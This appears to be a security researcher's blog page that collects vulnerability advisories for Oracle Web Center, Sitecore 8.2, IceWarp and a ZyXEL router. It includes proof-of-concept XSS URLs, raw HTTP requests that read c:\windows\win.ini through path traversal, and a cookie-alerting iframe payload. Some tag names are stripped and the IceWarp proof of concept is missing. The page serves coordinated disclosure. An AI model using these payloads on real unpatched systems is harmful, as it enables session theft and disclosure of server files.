Oracle Web Center XSS

Oracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]

Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>

 


Solution
========================================================================================
Apply Oracle CPU July 2017

Sitecore CMS v 8.2, cross site scripting & arbitrary file access

Hi folks,

Multiple vulnerabilities were found in the Sitecore version 8.2. Which were reported to Sitecore CMS on the 5th of May,2017. A patch was released on the 27th of June, 2017. It is recommended to update the Sitecore CMS installation. The exploit is being made public after the patch has been released.

Exploit:[CVE-2017-11439, CVE-2017-11440]

Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net

Disclaimer: Everything mentioned below is for educational puposes. The vulnerability details are mentioned as is. I would not be held responsible for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. The vulnerabilities include two instances of arbitrary file access and once instance of reflected cosssite scripting.

1: Arbitrary file access:

– Description:

The vulnerability lies in the tools which can be accessed via the administrator user. The vulnerability exists because there is no bound check for absolute path in the application, that is, if the absolute path is provided to the vulnerable URL, it reads the path and shows the contents of the file requested.

– Exploit:
1. Once authenticated as the administrator perform a GET request to the followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the followiung URL:

POST /sitecore/admin/LinqScratchPad.aspx HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= <OMITTED> &__VIEWSTATEGENERATOR= <OMITTED> &__EVENTVALIDATION= <OMITTED> &LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%5Cwin.ini&Fetch=

 

2. Reflected Cross-site Scripting:
– Description:
The application does not sanatize the USER input which allows a normal authenticated user to exploit this vulnerability.

 

– Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A// <OMITTED> /sitecore/shell/Applications/Tools/Run&__CSRFTOKEN= <OMITTED> &__VIEWSTATE= <OMITTED> &__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(document.cookie)%3B%22%3E%3C%2Fiframe%3E

++++++++++++++++++++++++++++++++++++++++++++++++++++

Time-Line:

  • Initial inquiry – May 5, 2017
  • Vulnerability advisory submission – May 5, 2017
  • Patch release – June 27, 2017
  • Publicly released – July 3, 2017

 

 

ICEWARP Multiple Clients, Persistent Cross Site Scripting (XSS)

[Re-post] Original Post, posted on: 15th Feb, 2014 on Xc0re blog.

While going through the Icewarp client I found that  it is possible to inject malicious HTML Element tags into the email and cause a Cross site Scripting (XSS) payload to be executed.

The versions that I tested on, were  :

  • 11.0.0.0 (2014-01-25) x64  (http://demo.icewarp.com/)
  • 10.3.4

————–

The details about the POC are as follows :

It was observed that the ICEWARP Client Version 10.3.4 is vulnerable to tag as well as tag.  Any attacker can create a specially crafted message and inject it into the Signature and as soon as the signature is loaded it will execute the XSS payload.

The Latest ICEWARP Client version 11.0.0 was tested on ICEWARPs own website : demo.icewarp.com and was observed that it filters the tag but does not filter the tag thus allowing the injection of malicious payload into the Signature portion and as soon as the signature is selected , it executes the payload. On further testing it was found that the vulnerability found in this version  can not qualify as a complete persistent vulnerability but in order to attack one has to use social engineering for the person to paste and execute.

Once the XSS payload was embedded , it always executed when the compose email was clicked but once the email was saved as draft , the payload disappeared.  It was noticable that in the signature box when we embedded >alert(1); , it got filtered immediately and never carried to the compose email but with Embed and Object tag it did execute on the compose email level.

Proof Of Concept
=================

Can be found here:—–

 

ZyXEL P-660R-T1 V2 XSS Zeroday Vulnerability

I recently found a vulnerability in Zyxel P-660R T1 . Although the impact factor is quite low as it is an XSS (Cross site scripting) but still  a vulnerability is a vulnerability .

Xc0re Security Research Group

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

Exploit:

VECTOR : http://IP/Forms/home_1?&HomeCurrent_Date=‘ XSS Vector ‘01%2F01%2F2000

This works with the post request too ! As by default this value is sent through POST request.

Author : Usman Saeed , Xc0re Security Research Group.